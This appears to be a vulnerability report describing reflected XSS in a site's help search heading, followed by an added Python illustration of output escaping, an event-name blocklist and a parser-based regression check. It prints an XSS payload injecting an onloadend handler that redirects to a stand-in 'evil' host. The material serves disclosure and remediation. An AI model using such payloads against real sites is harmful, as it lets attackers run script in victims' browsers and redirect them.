Security Vulnerabilities Reported


XSS vulnerability through the help search results page.

The search query is sent as a GET parameter and is rendered unescaped in the page heading, even though the same value is escaped immediately afterwards in the results. This allows script to be executed directly from a malicious URL.

There was some protection: the site returned a 403 if you attempted to include onload or onhover events in the query. This is a bad case of trying to block a list of specific JavaScript event names in an attempt to prevent XSS.

<h1 class="app-title"><span>Showing results for </span><a href="//" onloadend="document.location=http://evil"><b><i>bob" onloadend="document.location=http://evil</i></b></a></h1>
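The following is an added illustration of the issue and its fix; it is not code from the report or from the affected site. The heading template, the URL path /help/search and the use of Python are assumptions (the report does not say what the site is written in), and the blocklist is modelled on the report's description of the 403 behaviour with a word-boundary match, since the report's own onloadend payload was not blocked. The constructed input is the query string from the report's example. The point is that output encoding of the query closes the injection regardless of which event name the attacker chooses, which an event-name blocklist cannot do.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import quote_plus

# Constructed sample input: the query string used in the report's example.
SAMPLE_QUERY = 'bob" onloadend="document.location=http://evil'

# Assumed model of the site's filter: 403 when "onload" or "onhover" appears
# as a whole word. A word-boundary match lets "onloadend" through, which is
# consistent with what the report observed.
BLOCKED_EVENT_RE = re.compile(r"\b(onload|onhover)\b", re.IGNORECASE)


def blocklist_rejects(query: str) -> bool:
    """True if the naive event-name blocklist would answer with HTTP 403."""
    return BLOCKED_EVENT_RE.search(query) is not None


def render_heading_unescaped(query: str) -> str:
    """Vulnerable rendering (assumed template): the raw query is interpolated
    into both an attribute value and element text."""
    return (
        '<h1 class="app-title"><span>Showing results for </span>'
        f'<a href="/help/search?q={query}"><b><i>{query}</i></b></a></h1>'
    )


def render_heading_escaped(query: str) -> str:
    """Hardened rendering: the query is URL-encoded for the href and
    HTML-escaped (including quotes) for both attribute and text context."""
    href = html.escape(quote_plus(query), quote=True)
    text = html.escape(query, quote=True)
    return (
        '<h1 class="app-title"><span>Showing results for </span>'
        f'<a href="/help/search?q={href}"><b><i>{text}</i></b></a></h1>'
    )


class _EventAttrCollector(HTMLParser):
    """Collects the names of on* attributes the browser would treat as
    event handlers, i.e. what actually executes rather than what merely
    appears in the markup as text."""

    def __init__(self) -> None:
        super().__init__()
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append(name.lower())


def event_handler_attributes(markup: str) -> list[str]:
    """Parse the rendered heading and return any event-handler attributes."""
    parser = _EventAttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.handlers


if __name__ == "__main__":
    print("blocklist rejects sample query:", blocklist_rejects(SAMPLE_QUERY))
    vulnerable = render_heading_unescaped(SAMPLE_QUERY)
    fixed = render_heading_escaped(SAMPLE_QUERY)
    print("handlers in vulnerable output:", event_handler_attributes(vulnerable))
    print("handlers in escaped output:  ", event_handler_attributes(fixed))
    print(fixed)
```

Running the module shows the blocklist passing the report's query while the unescaped template yields a live onloadend attribute; the escaped template yields none, because the quote that closed the href is now `&quot;` and the handler text is inert. The parser-based check is also the right way to write a regression test for this class of bug: grepping the output for `on\w+=` would flag the escaped text too, whereas only attributes the HTML parser sees will execute.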

Reported Fixed Unknown